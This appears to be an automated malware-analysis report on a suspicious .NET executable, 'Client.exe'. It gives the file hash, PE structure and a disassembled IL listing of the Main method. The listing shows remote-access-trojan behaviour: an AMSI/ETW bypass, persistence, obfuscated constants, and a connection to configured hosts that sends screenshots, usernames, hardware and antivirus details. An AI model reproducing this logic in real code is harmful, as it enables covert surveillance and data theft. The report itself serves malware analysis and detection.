Suspicious
Suspect

7de7341601cfab62a5f49bf35f6034de

PE Executable
MD5: 7de7341601cfab62a5f49bf35f6034de
Size: 188.93 KB
application/x-dosexec
Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Low


PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
kbs5dmihkrpxk3biw6srv
w0cl2vmtyrjylxsl973y3mqezc60vy
Informations
Module Name: Client.exe
Full Name: Client.exe
EntryPoint: System.Void Client.Program::Main(System.String[])
Scope Name: Client.exe
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: Client
Assembly Version: 1.0.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: .NETFramework,Version=v4.0
Total Strings: 286
Main Method: System.Void Client.Program::Main(System.String[])
Main IL Instruction Count: 217

Main IL

call System.Void Client.Config::Init() call System.Void Client.Helper.AsmiAndETW::Bypass() ldsfld System.String Client.Config::Install ldstr *AWE call System.String Client.Helper.EncryptString::Decode(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_0028: ldsfld System.String Client.Config::Mutex call System.Void Client.Helper.Install::Run() ldsfld System.String Client.Config::Mutex call System.Boolean Client.Helper.MutexControl::CreateMutex(System.String) brtrue IL_003C: call System.Void Client.Helper.Methods::MaxPriority() leave IL_032C: ret call System.Void Client.Helper.Methods::MaxPriority() call System.Void Client.Helper.Methods::PreventSleep() ldsfld Client.Helper.Client Client.Program::client ldfld System.Boolean Client.Helper.Client::itsConnect brtrue IL_0303: nop ldsfld System.String Client.Config::Hosts ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> nop <null> ldc.r8 88.5 ldc.r8 29.5 sub <null> call System.Int32 System.Convert::ToInt32(System.Double) stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.0 <null> ldloc.0 <null> ldsfld System.Random Client.Helper.Methods::random ldloc.0 <null> ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> nop <null> ldc.r8 2 ldc.r8 29 mul <null> call System.Int32 System.Convert::ToInt32(System.Double) stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.1 <null> ldloc.1 <null> ldc.i4.1 <null> ldelem System.String ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> nop <null> ldc.r8 22 ldc.r8 22 add <null> call System.Int32 System.Convert::ToInt32(System.Double) stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.2 <null> ldsfld Client.Helper.Client Client.Program::client callvirt System.Void Client.Helper.Client::Disconnect() ldsfld 
Client.Helper.Client Client.Program::client ldloc.1 <null> ldc.i4.0 <null> ldelem System.String ldloc.2 <null> ldsfld System.Random Client.Helper.Methods::random ldloc.2 <null> ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void Client.Helper.Client::Connect(System.String,System.String) ldsfld Client.Helper.Client Client.Program::client ldfld System.Boolean Client.Helper.Client::itsConnect brfalse IL_0303: nop ldsfld Client.Helper.Client Client.Program::client ldsfld Client.Helper.Client Client.Program::client newobj System.Void Client.Helper.PingChecker::.ctor(Client.Helper.Client) stfld Client.Helper.PingChecker Client.Helper.Client::pingChecker ldsfld Client.Helper.Client Client.Program::client ldsfld Client.Helper.Client Client.Program::client newobj System.Void Client.Helper.LastPing::.ctor(Client.Helper.Client) stfld Client.Helper.LastPing Client.Helper.Client::lastPing ldsfld Client.Helper.Client Client.Program::client nop <null> ldc.r8 7 ldc.r8 7 add <null> call System.Int32 System.Convert::ToInt32(System.Double) newarr System.Object dup <null> ldc.i4.0 <null> ldstr ,qzzE{* call System.String Client.Helper.EncryptString::Decode(System.String) stelem.ref <null> dup <null> ldc.i4.1 <null> call System.Byte[] Client.Helper.Methods::CaptureResizeReduceQuality() stelem.ref <null> dup <null> nop <null> ldc.i4 1363145560 ldc.i4 1363145562 xor <null> conv.i4 <null> ldsfld System.String Client.Config::Group stelem.ref <null> dup <null> nop <null> ldc.r8 4.5 ldc.r8 1.5 sub <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::Hwid stelem.ref <null> dup <null> nop <null> ldc.r8 2 ldc.r8 2 add <null> call System.Int32 System.Convert::ToInt32(System.Double) call System.String System.Environment::get_UserName() ldstr gSg call System.String Client.Helper.EncryptString::Decode(System.String) call System.String System.Environment::get_MachineName() call 
System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> nop <null> ldc.r8 2.5 ldc.r8 2.5 add <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::Camera stelem.ref <null> dup <null> nop <null> ldc.r8 2 ldc.r8 3 mul <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::Cpu stelem.ref <null> dup <null> nop <null> ldc.r8 24.5 ldc.r8 3.5 div <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::Gpu stelem.ref <null> dup <null> nop <null> ldc.r8 12 ldc.r8 4 sub <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::WindowsVersion stelem.ref <null> dup <null> nop <null> ldc.r8 13.5 ldc.r8 4.5 sub <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::AntiVirus stelem.ref <null> dup <null> nop <null> ldc.r8 2 ldc.r8 5 mul <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::Version stelem.ref <null> dup <null> nop <null> ldc.r8 60.5 ldc.r8 5.5 div <null> call System.Int32 System.Convert::ToInt32(System.Double) ldsfld System.String Client.Config::DataInstall stelem.ref <null> dup <null> nop <null> ldc.i4 1743618521 ldc.i4 1743618517 xor <null> conv.i4 <null> ldsfld System.String Client.Config::Privilege stelem.ref <null> dup <null> nop <null> ldc.i4 24108876 ldc.i4 24108865 xor <null> conv.i4 <null> call System.String Client.Helper.Methods::GetActiveWindowTitle() stelem.ref <null> call System.Byte[] Leb128.LEB128::Write(System.Object[]) callvirt System.Void Client.Helper.Client::Send(System.Byte[]) nop <null> ldc.r8 100 ldc.r8 100 add <null> call System.Int32 System.Convert::ToInt32(System.Double) call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_0046: ldsfld Client.Helper.Client Client.Program::client pop <null> leave IL_032C: ret 
ret <null>
